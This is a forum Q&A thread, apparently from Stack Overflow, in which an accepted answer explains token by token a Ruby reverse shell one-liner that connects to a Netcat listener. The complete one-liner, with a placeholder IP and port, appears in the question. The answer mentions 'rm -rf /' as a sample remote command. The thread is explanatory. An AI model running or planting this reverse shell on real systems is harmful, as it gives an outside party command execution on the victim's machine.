# Ruby one-liner breakdown?

Tags: ruby-on-rails, ruby, shell, command-line, netcat

I'm new to Ruby and trying to better understand this reverse shell one-liner designed to connect back to a Netcat listener.

Can someone try breaking the command down and explaining what some of the code actually does? For example, I know "TCPSocket.new" creates the new TCP socket, but what's "cmd=c.gets", "IO.popen", "|io|c.print io.read", etc. And what is the purpose of the `while` loop?

```
ruby -rsocket -e "c=TCPSocket.new('<IP Address>','<Port>');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"
```

Answer (score 6, accepted):

OK, let's break this one down.

```
ruby
```

runs the ruby interpreter, you likely knew that part

```
-rsocket
```

does the equivalent of `require "socket"` (`r` for require)

```
-e "some string"
```

run `some string` as a ruby script (`e` for execute)

```
while(cmd=c.gets)
```

is saying "while `gets` (get string up to and including the next newline) returns something from the connection `c`, i.e. while there's data coming in, assign it to `cmd` and..

```
IO.popen(cmd,'r'){|io|c.print io.read}
```

.. run `cmd` as a shell command, read the output, and `print` it back onto the connection `c`.

So, effectively, receive a command (like `ls .` or `rm -rf /`) over the network, read it in, run it, take the output, and send it back.  Keep doing so until the other side stops sending commands.

Because `gets` will block and wait for the next line to come in, this one-liner will sit there waiting until the connection is closed.

Probably don't want to let other people send commands down that connection, since it'll run whatever they send directly on your computer, though that's presumably what you mean by "reverse shell".